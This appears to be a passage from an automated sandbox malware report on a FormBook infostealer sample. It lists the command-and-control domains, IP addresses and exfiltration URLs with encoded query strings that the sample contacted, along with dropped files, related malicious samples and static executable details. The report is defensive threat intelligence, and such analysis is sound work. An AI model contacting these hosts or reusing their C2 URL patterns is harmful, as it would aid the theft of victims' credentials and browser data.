                  www.rpa.asia
                  		160.25.166.123
                  		truetrue
                    		unknown
                    www.pitaloka.xyz
                    		68.66.226.119
                    		truetrue
                      		unknown
                      www.unlimitu.website
                      		209.74.79.40
                      		truetrue
                        		unknown
                        031233226.xyz
                        		144.76.229.203
                        		truetrue
                          		unknown
                          www.einpisalpace.shop
                          		188.114.97.3
                          		truetrue
                            		unknown
                            www.dejikenkyu.cyou
                            		104.21.96.1
                            		truetrue
                              		unknown
                              www.grimbo.boats
                              		172.67.182.198
                              		truefalse
                                		high
                                www.autonomousoid.pro
                                		13.248.169.48
                                		truetrue
                                  		unknown
                                  www.nhengtai.net
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.366800008.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.031233226.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.unlimitu.website/bhgd/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.deacapalla.online/9tt6/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.rpa.asia/74m3/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.deacapalla.online/9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.031233226.xyz/lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.grimbo.boats/nuxf/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.einpisalpace.shop/2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.rpa.asia/74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.unlimitu.website/bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.pitaloka.xyz/iwk9/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.grimbo.boats/nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.031233226.xyz/lgqt/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.autonomousoid.pro/m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.autonomousoid.pro/m1if/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.dejikenkyu.cyou/58m5/true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.pitaloka.xyzYLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5HpROUTE.EXE, 00000007.00000002.3229283746.000000000423C000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.000000000372C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dts.gnpge.comYLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://digi-searches.com/sk-logabpstatus.php?a=bFp4ODVzaXVsTFczSDdQcmZwbFVZRVY1RlBJVDJnQi9jS1A1dmQ1dROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://digi-searches.com/px.js?ch=1ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://einpisalpace.shop/firefox.exe, 0000000B.00000002.2009532526.0000000027D34000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://digi-searches.com/px.js?ch=2ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          144.76.229.203
                                                          		031233226.xyzGermany
                                                          		24940HETZNER-ASDEtrue
                                                          172.67.182.198
                                                          		www.grimbo.boatsUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          160.25.166.123
                                                          		www.rpa.asiaunknown
                                                          		17676GIGAINFRASoftbankBBCorpJPtrue
                                                          13.248.169.48
                                                          		www.autonomousoid.proUnited States
                                                          		16509AMAZON-02UStrue
                                                          188.114.97.3
                                                          		www.einpisalpace.shopEuropean Union
                                                          		13335CLOUDFLARENETUStrue
                                                          209.74.79.40
                                                          		www.unlimitu.websiteUnited States
                                                          		31744MULTIBAND-NEWHOPEUStrue
                                                          104.21.96.1
                                                          		www.dejikenkyu.cyouUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          208.91.197.27
                                                          		www.deacapalla.onlineVirgin Islands (BRITISH)
                                                          		40034CONFLUENCE-NETWORK-INCVGtrue
                                                          68.66.226.119
                                                          		www.pitaloka.xyzUnited States
                                                          		55293A2HOSTINGUStrue

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588237
                                                          Start date and time:2025-01-10 23:03:57 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 48s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:gH3LlhcRzg.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@16/9
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 49
                                                          • Number of non-executed functions: 283
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.

                                                          Simulations

                                                          Behavior and APIs

                                                          No simulations

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          172.67.182.198rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/mjs1/
                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/kxtt/
                                                          CJE003889.exeGet hashmaliciousFormBookBrowse
                                                          • www.grimbo.boats/mjln/
                                                          160.25.166.123QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                          • www.rpa.asia/bwjl/
                                                          QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                          • www.rpa.asia/bwjl/
                                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                          • www.rpa.asia/bwjl/
                                                          z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                          • www.rpa.asia/ggyo/
                                                          13.248.169.48fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                          • www.bcg.services/5onp/
                                                          aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                          • www.fortevision.xyz/dash/
                                                          EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • www.sfantulandrei.info/wvsm/
                                                          bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                          • www.108.foundation/lnu5/
                                                          OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                          • www.tals.xyz/h8xm/
                                                          QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                          • www.hsa.world/09b7/
                                                          cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                          • www.bcg.services/5onp/
                                                          3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                          • www.shipley.group/5g1j/
                                                          KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                          • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                          TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                          • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.rpa.asiaQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                          • 160.25.166.123
                                                          QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                          • 160.25.166.123
                                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                          • 160.25.166.123
                                                          z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                          • 160.25.166.123
                                                          www.grimbo.boatsFG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.182.198
                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.18.171
                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.182.198
                                                          CJE003889.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.182.198
                                                          www.einpisalpace.shop1162-201.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          www.dejikenkyu.cyouSW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.80.1
                                                          www.unlimitu.websitePO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.79.40
                                                          www.deacapalla.online9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                          • 208.91.197.27
                                                          NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                          • 208.91.197.27

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          HETZNER-ASDEfrosty.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 78.47.94.125
                                                          KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                          • 136.243.64.147
                                                          NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                          • 136.243.64.147
                                                          4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                          • 95.217.25.228
                                                          4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                          • 95.217.25.228
                                                          QUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                          • 195.201.57.90
                                                          http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                          • 178.63.248.53
                                                          1162-201.exeGet hashmaliciousFormBookBrowse
                                                          • 136.243.64.147
                                                          3.elfGet hashmaliciousUnknownBrowse
                                                          • 197.242.86.251
                                                          GIGAINFRASoftbankBBCorpJPfrosty.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 60.121.97.189
                                                          frosty.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 60.107.97.85
                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 126.58.120.103
                                                          5.elfGet hashmaliciousUnknownBrowse
                                                          • 218.134.63.197
                                                          6.elfGet hashmaliciousUnknownBrowse
                                                          • 126.240.48.187
                                                          armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 126.91.40.37
                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                          • 126.164.100.243
                                                          armv5l.elfGet hashmaliciousUnknownBrowse
                                                          • 60.90.173.14
                                                          3.elfGet hashmaliciousUnknownBrowse
                                                          • 126.91.154.87
                                                          Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                          • 126.104.203.9
                                                          CLOUDFLARENETUSM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.186.192
                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 104.21.80.1
                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 104.21.48.1
                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 104.21.32.1
                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 104.21.48.1
                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          • 104.21.80.1
                                                          http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Get hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.16.1
                                                          87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.96.1
                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.80.1

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\Ba4F6400

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1221538113908904
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                          MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                          SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                          SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                          SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Hymenophyllaceae

                                                          Download File
                                                          Process:C:\Users\user\Desktop\gH3LlhcRzg.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):287232
                                                          Entropy (8bit):7.994703663811101
                                                          Encrypted:true
                                                          SSDEEP:6144:UlSDc5xOrnkC4EfOcc4X/9Rr5UkGbLkSUMbw8:UcDc4rR4EfObq19fGHkabL
                                                          MD5:80CE597F717F01D4AEAB5E3417EA0E6E
                                                          SHA1:BB8A4F2B2E038C8D21B67857DB20EB98CB3AEFCB
                                                          SHA-256:A1F87BA40D991E6A353886770B761D7DF4C488ACD781292706904542930FBA64
                                                          SHA-512:566B27B3AB432DED919A053CA63ACE1AEBE4752946F1F25993A0AD048E9FB4C34DAF5DE2B70139177DD2297A7155EAE7577EBA88DF6921F9A9B68732926B0116
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...C:NGO0FAL..78.MJLS25Lp2GNTC9NGO4FALP278BMJLS25L02GNTC9NGO.FAL^-.6B.C.r.4....&=0.>5 S4 !pQVV,">l1W.>E\g':c}..oY)%)~?:2fMJLS25LI3N.i#^.z/S.|,7.-..p,4./..{.3.#...&&..[TP.--.S25L02GN..9N.N5F..`i78BMJLS2.L23LO_C9.CO4FALP278.YJLS"5L0RCNTCyNG_4FANP218BMJLS23L02GNTC9.CO4DALP278@M..S2%L0"GNTC)NG_4FALP2'8BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278l9/4'25Ld|CNTS9NG.0FA\P278BMJLS25L02gNT#9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FAL

                                                          C:\Users\user\AppData\Local\Temp\aut9649.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\gH3LlhcRzg.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):287232
                                                          Entropy (8bit):7.994703663811101
                                                          Encrypted:true
                                                          SSDEEP:6144:UlSDc5xOrnkC4EfOcc4X/9Rr5UkGbLkSUMbw8:UcDc4rR4EfObq19fGHkabL
                                                          MD5:80CE597F717F01D4AEAB5E3417EA0E6E
                                                          SHA1:BB8A4F2B2E038C8D21B67857DB20EB98CB3AEFCB
                                                          SHA-256:A1F87BA40D991E6A353886770B761D7DF4C488ACD781292706904542930FBA64
                                                          SHA-512:566B27B3AB432DED919A053CA63ACE1AEBE4752946F1F25993A0AD048E9FB4C34DAF5DE2B70139177DD2297A7155EAE7577EBA88DF6921F9A9B68732926B0116
                                                          Malicious:false
                                                          Preview:...C:NGO0FAL..78.MJLS25Lp2GNTC9NGO4FALP278BMJLS25L02GNTC9NGO.FAL^-.6B.C.r.4....&=0.>5 S4 !pQVV,">l1W.>E\g':c}..oY)%)~?:2fMJLS25LI3N.i#^.z/S.|,7.-..p,4./..{.3.#...&&..[TP.--.S25L02GN..9N.N5F..`i78BMJLS2.L23LO_C9.CO4FALP278.YJLS"5L0RCNTCyNG_4FANP218BMJLS23L02GNTC9.CO4DALP278@M..S2%L0"GNTC)NG_4FALP2'8BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278l9/4'25Ld|CNTS9NG.0FA\P278BMJLS25L02gNT#9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FALP278BMJLS25L02GNTC9NGO4FAL

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.167688385562831
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:gH3LlhcRzg.exe
                                                          File size:1'187'328 bytes
                                                          MD5:a238864f937038d6fe39092719a1eff0
                                                          SHA1:64dee05a230179d9b8baf50fba1722efecc84a67
                                                          SHA256:950beb7d3de2bad234415e45b789304bd6ac6e50e6435a78f85e188f03044ae9
                                                          SHA512:ba513b2f7d17430df6a19eff55b6fea0de1f8be1ffe0a0aaf458796c1fb30501b31e94be3c0216d18fc3ed33f22475e522877296be3c1df976bd8d426a60473b
                                                          SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6Fa7LYzBm/+jQPHkCWY:cu0c++OCvkGs9Fa7LYU+uHQY
                                                          TLSH:9245BF2273DDC360CB669173BF6AB7016EBF7C614630B95B2F880D7DA950161262C7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                          File Icon

                                                          Icon Hash:aaf3e3e3938382a0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x675788B1 [Tue Dec 10 00:17:53 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F3CDD7F82DAh
                                                          jmp 00007F3CDD7EB0A4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F3CDD7EB22Ah
                                                          cmp edi, eax
                                                          jc 00007F3CDD7EB58Eh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007F3CDD7EB229h
                                                          rep movsb
                                                          jmp 00007F3CDD7EB53Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007F3CDD7EB3F4h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F3CDD7EB230h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007F3CDD7EB700h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007F3CDD7EB3CDh
                                                          test edi, 00000003h
                                                          jne 00007F3CDD7EB3DEh
                                                          test esi, 00000003h
                                                          jne 00007F3CDD7EB3BDh
                                                          bt edi, 02h
                                                          jnc 00007F3CDD7EB22Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F3CDD7EB233h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
